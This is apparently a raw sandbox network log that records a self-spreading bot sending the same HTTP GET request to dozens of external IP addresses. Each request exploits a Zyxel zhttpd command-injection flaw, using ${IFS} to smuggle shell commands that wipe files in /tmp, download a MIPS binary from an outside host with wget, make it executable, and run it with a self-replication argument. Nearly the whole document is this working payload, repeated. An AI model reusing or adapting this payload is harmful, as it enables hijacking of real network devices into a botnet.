                                                Jan 12, 2024 18:24:27.637860060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2282192.168.2.1351696101.110.23.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637918949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2283192.168.2.134203038.158.196.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.637983084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2284192.168.2.1355596125.44.249.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638042927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2285192.168.2.1354072209.84.191.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638091087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2286192.168.2.134823862.135.137.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638164043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2287192.168.2.135049897.132.169.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638217926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2288192.168.2.135408613.155.172.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638267994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2289192.168.2.134198084.37.15.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638300896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2290192.168.2.1358550211.249.201.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638369083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2291192.168.2.135066880.197.8.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638391972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2292192.168.2.135470012.70.51.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638452053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2293192.168.2.134595895.92.65.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638526917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2294192.168.2.1357352185.3.125.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638569117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2295192.168.2.134936459.230.139.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638616085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2296192.168.2.1356836183.157.217.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638673067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2297192.168.2.135302292.224.41.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638700962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2298192.168.2.1358140159.24.6.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638736963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2299192.168.2.1357916190.48.164.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638825893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2300192.168.2.1334608207.120.43.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638864040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2301192.168.2.1346960170.55.25.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638890028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2302192.168.2.135633039.231.183.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.638947964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2303192.168.2.1347776100.236.18.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639008999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2304192.168.2.1360134168.227.98.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639080048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2305192.168.2.1345928125.173.226.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639158010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2306192.168.2.133975659.10.53.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639209986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2307192.168.2.134272438.98.217.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639216900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2308192.168.2.134903282.143.222.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639309883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2309192.168.2.1349646100.38.142.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639367104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2310192.168.2.133917685.162.29.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639424086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2311192.168.2.1350898137.190.16.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639502048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2312192.168.2.133829018.232.233.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639544964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2313192.168.2.1342174199.120.83.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639584064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2314192.168.2.134718247.12.68.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639657021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2315192.168.2.134788240.180.138.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639728069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2316192.168.2.1345538206.35.127.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639791012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2317192.168.2.133628258.88.60.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639853001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2318192.168.2.1338640146.103.60.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639903069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2319192.168.2.1354434126.205.36.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639957905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2320192.168.2.135056675.159.29.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.639991999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2321192.168.2.134939845.25.143.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640059948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2322192.168.2.1340224175.56.169.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640119076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2323192.168.2.1346798113.209.236.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640177011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2324192.168.2.133484236.192.254.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640223026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2325192.168.2.1341200166.9.155.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640252113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2326192.168.2.133619498.179.239.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640285969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2327192.168.2.135282841.202.80.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640333891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2328192.168.2.134562483.170.143.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640388012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2329192.168.2.133297273.239.84.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640460014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2330192.168.2.1348672126.10.46.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640527964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2331192.168.2.1345528142.100.95.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640603065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2332192.168.2.135078475.96.100.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640641928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2333192.168.2.1333788112.103.117.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640698910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2334192.168.2.1336894200.102.77.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640748978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2335192.168.2.135628240.72.11.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640808105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2336192.168.2.13434189.190.3.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640891075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2337192.168.2.1337360142.204.30.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.640969992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2338192.168.2.1341726149.90.64.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641020060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2339192.168.2.133805284.104.76.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641071081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2340192.168.2.133624443.210.194.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641125917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2341192.168.2.1333522143.78.60.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641196012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2342192.168.2.1342224196.10.35.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641258001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2343192.168.2.135100438.36.101.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641302109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2344192.168.2.1347986155.227.220.134443
                                                TimestampBytes transferredDirectionData
